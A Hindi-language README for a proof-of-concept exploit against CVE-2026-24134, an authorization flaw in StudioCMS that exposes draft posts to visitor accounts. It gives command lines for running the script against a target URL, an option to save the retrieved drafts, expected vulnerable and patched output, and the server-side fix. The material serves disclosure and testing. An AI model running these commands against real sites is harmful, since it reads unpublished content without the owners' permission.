
CVE-2026-24134 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो StudioCMS में एक Broken Object Level Authorization भेद्यता है, जो ड्राफ्ट सामग्री तक अनधिकृत पहुंच को प्रदर्शित करता है।
इस रिपॉजिटरी में CVE-2026-24134 के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है, जो StudioCMS में एक ब्रोकन ऑब्जेक्ट लेवल ऑथराइज़ेशन (BOLA) भेद्यता है।
cve_2026_24134_poc.py - पायथन शोषण स्क्रिप्टpip install requests colorama
# मूल उपयोग
python3 cve_2026_24134_poc.py \
-u http://localhost:4321 \
--username visitor_user \
--password visitor_pass \
--uuid bad87630-69a4-4cd6-bcb2-6965839dc148
# आउटपुट को फ़ाइल में सहेजें
python3 cve_2026_24134_poc.py \
-u http://localhost:4321 \
--username visitor_user \
--password visitor_pass \
--uuid bad87630-69a4-4cd6-bcb2-6965839dc148 \
--save
python3 cve_2026_24134_poc.py \
-u http://localhost:4321 \
--auto-test \
--visitor-user visitor01 \
--visitor-pass visitorpass \
--editor-user editor01 \
--editor-pass editorpass \
--uuid bad87630-69a4-4cd6-bcb2-6965839dc148
-u, --url - लक्षित StudioCMS आधार URL--uuid - लक्षित ड्राफ्ट सामग्री UUID--username - प्रमाणीकरण के लिए उपयोगकर्ता नाम--password - प्रमाणीकरण के लिए पासवर्ड--auto-test - स्वचालित परीक्षण सक्षम करें--visitor-user - विज़िटर खाता उपयोगकर्ता नाम--visitor-pass - विज़िटर खाता पासवर्ड--editor-user - संपादक खाता उपयोगकर्ता नाम--editor-pass - संपादक खाता पासवर्ड--save - प्रतिक्रिया सामग्री को फ़ाइल में सहेजें--no-ssl-verify - SSL प्रमाणपत्र सत्यापन अक्षम करेंpython3 cve_2026_24134_poc.py \
--url http://target.com \
--auto-test \
--visitor-user test_visitor \
--visitor-pass SecurePass123! \
--editor-user test_editor \
--editor-pass SecurePass456! \
--uuid 12345678-1234-1234-1234-123456789abc
यदि भेद्य है तो अपेक्षित आउटपुट:
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[+] Successfully accessed draft content!
[!] VULNERABILITY CONFIRMED!
यदि पैच किया गया है तो अपेक्षित आउटपुट:
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[*] Access denied (403 Forbidden)
[+] VULNERABILITY NOT PRESENT
python3 cve_2026_24134_poc.py \
--url http://localhost:4321 \
--username attacker \
--password pass123 \
--uuid target-uuid-here \
--save
यह पूरी ड्राफ्ट सामग्री को draft_{uuid}.html में सहेज देगा।
[+] - सफल संचालन (हरा)[*] - सूचनात्मक संदेश (नीला)[!] - चेतावनी (पीला)[-] - त्रुटि (लाल)यदि आप StudioCMS का भेद्य संस्करण चला रहे हैं, तो तुरंत पैच किए गए संस्करण में अपडेट करें।
वास्तविक समस्या: प्राधिकरण जाँच क्लाइंट-साइड (JavaScript) पर की गई थी, सर्वर-साइड पर नहीं।
विकास टीम के अनुसार:
"Currently the rank level check to redirect is being done in client JS, which was supposed to be replaced shortly there after."
समाधान: प्राधिकरण को क्लाइंट से सर्वर पर स्थानांतरित करें।
मुख्य सिद्धांत: क्लाइंट पर कभी भरोसा न करें। क्लाइंट-साइड सुरक्षा = UX संवर्धन। सर्वर-साइड सुरक्षा = वास्तविक सुरक्षा।
महत्वपूर्ण: यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
इस PoC या भेद्यता के बारे में प्रश्नों के लिए:
यह PoC शैक्षिक उद्देश्यों के लिए जारी किया गया है। जिम्मेदारी और नैतिकता से उपयोग करें।